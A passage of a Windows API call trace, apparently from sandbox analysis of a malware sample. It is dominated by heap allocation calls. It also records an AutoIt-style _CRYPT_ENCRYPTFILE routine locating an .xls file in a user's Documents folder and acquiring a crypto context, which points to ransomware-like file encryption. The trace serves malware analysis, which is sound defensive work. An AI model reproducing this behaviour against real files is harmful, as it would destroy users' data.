dwFlags=0x0, lpMem=0x43cb2a0 | out: hHeap=0x1780000) returned 1 [0080.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb318 | out: hHeap=0x1780000) returned 1 [0080.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a4260 | out: hHeap=0x1780000) returned 1 [0080.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0080.856] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0080.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eafd0 | out: hHeap=0x1780000) returned 1 [0080.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0080.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0080.856] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0080.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0080.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0080.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0080.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb360 | out: hHeap=0x1780000) returned 1 [0080.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0080.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0080.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0080.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0080.856] PeekMessageW (in: lpMsg=0x144e4f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e4f4) returned 0 [0080.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0080.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0080.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8de0 | out: hHeap=0x1780000) returned 1 [0080.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0080.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0080.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0080.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0080.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0080.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0080.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0080.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0080.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0080.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0080.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0080.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0080.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0080.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0080.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0080.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0080.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0080.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0080.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ea8 | out: hHeap=0x1780000) returned 1 [0080.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0080.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0080.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0080.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0080.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0080.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0080.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0080.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0080.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0080.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0080.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb228 | out: hHeap=0x1780000) returned 1 [0080.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050fa8 | out: hHeap=0x1780000) returned 1 [0080.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0080.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb258 | out: hHeap=0x1780000) returned 1 [0080.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0080.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2e8 | out: hHeap=0x1780000) returned 1 [0080.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb378 | out: hHeap=0x1780000) returned 1 [0080.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb330 | out: hHeap=0x1780000) returned 1 [0080.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb498 | out: hHeap=0x1780000) returned 1 [0080.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb390 | out: hHeap=0x1780000) returned 1 [0080.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3a8 | out: hHeap=0x1780000) returned 1 [0080.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0080.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0080.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0080.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0080.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0080.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0080.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0080.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0080.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0080.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0080.858] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0080.858] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.858] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43cada8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0080.858] CloseHandle (hObject=0x298) returned 1 [0080.859] FreeLibrary (hLibModule=0x772d0000) returned 1 [0080.859] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0080.859] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\E_f7p3czO1Cdd9o.xls", lpFindFileData=0x144e620 | out: lpFindFileData=0x144e620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d2cd410, ftCreationTime.dwHighDateTime=0x1d5e302, ftLastAccessTime.dwLowDateTime=0xba9d2b40, ftLastAccessTime.dwHighDateTime=0x1d5f114, ftLastWriteTime.dwLowDateTime=0xba9d2b40, ftLastWriteTime.dwHighDateTime=0x1d5f114, nFileSizeHigh=0x0, nFileSizeLow=0xa39c, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="E_f7p3czO1Cdd9o.xls", cAlternateFileName="E_F7P3~1.XLS")) returned 0x41ac740 [0080.859] FindClose (in: hFindFile=0x41ac740 | out: hFindFile=0x41ac740) returned 1 [0080.859] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0080.859] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0080.859] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0080.859] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0080.859] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0080.859] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0080.859] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1797128, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0081.071] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0081.072] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1796ee8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0081.072] CryptAcquireContextA (in: phProv=0x144e300, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144e300*=0x41a4d88) returned 1 [0081.072] TranslateMessage (lpMsg=0x144e97c) returned 0 [0081.072] DispatchMessageW (lpMsg=0x144e97c) returned 0x0 [0081.072] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0081.072] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0081.073] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0081.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0081.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9c68 [0081.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0081.073] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0081.073] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0081.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0081.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0081.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0081.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0081.073] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0081.073] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0081.073] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0081.073] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0081.073] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0081.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0081.073] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0081.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0081.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b98 [0081.073] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0081.073] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b98 | out: hHeap=0x1780000) returned 1 [0081.073] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0081.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0081.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2a40 [0081.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0081.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0081.073] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0081.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0081.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0081.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0081.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb1c8 [0081.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0081.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb348 [0081.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0081.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb348 | out: hHeap=0x1780000) returned 1 [0081.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0081.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb360 [0081.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c78 [0081.074] PeekMessageW (in: lpMsg=0x144e724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e724) returned 0 [0081.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0081.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0081.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0081.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0081.074] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0081.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0081.074] PeekMessageW (in: lpMsg=0x144e724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e724) returned 0 [0081.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c78 | out: hHeap=0x1780000) returned 1 [0081.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb360 | out: hHeap=0x1780000) returned 1 [0081.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0081.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0081.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0081.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1c8 | out: hHeap=0x1780000) returned 1 [0081.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0081.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0081.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1b0 | out: hHeap=0x1780000) returned 1 [0081.074] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0081.074] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0081.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0081.075] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0081.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac740 | out: hHeap=0x1780000) returned 1 [0081.075] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0081.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0081.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391dc8 [0081.075] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0081.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391dc8 | out: hHeap=0x1780000) returned 1 [0081.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0081.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb1c8 [0081.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0081.075] PeekMessageW (in: lpMsg=0x144e724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e724) returned 0 [0081.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0081.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0081.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0081.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0081.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0081.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0081.075] PeekMessageW (in: lpMsg=0x144e724, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e724) returned 0 [0081.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0081.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1c8 | out: hHeap=0x1780000) returned 1 [0081.075] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0081.075] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0081.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0081.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0081.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1e0 | out: hHeap=0x1780000) returned 1 [0081.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0081.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0081.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0081.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb240 | out: hHeap=0x1780000) returned 1 [0081.075] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0081.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0081.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffb8 | out: hHeap=0x1780000) returned 1 [0081.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0d8 | out: hHeap=0x1780000) returned 1 [0081.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2d0 | out: hHeap=0x1780000) returned 1 [0081.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb288 | out: hHeap=0x1780000) returned 1 [0081.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2b8 | out: hHeap=0x1780000) returned 1 [0081.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2e8 | out: hHeap=0x1780000) returned 1 [0081.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3d8 | out: hHeap=0x1780000) returned 1 [0081.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0081.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea730 | out: hHeap=0x1780000) returned 1 [0081.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0081.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0f0 | out: hHeap=0x1780000) returned 1 [0081.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1f8 | out: hHeap=0x1780000) returned 1 [0081.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0081.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0081.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb108 | out: hHeap=0x1780000) returned 1 [0081.076] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0081.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0081.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea730 [0081.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0081.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea730 | out: hHeap=0x1780000) returned 1 [0081.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0081.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0081.076] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0081.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0081.076] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0081.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2970 [0081.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ae0 [0081.076] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0081.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0081.076] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: 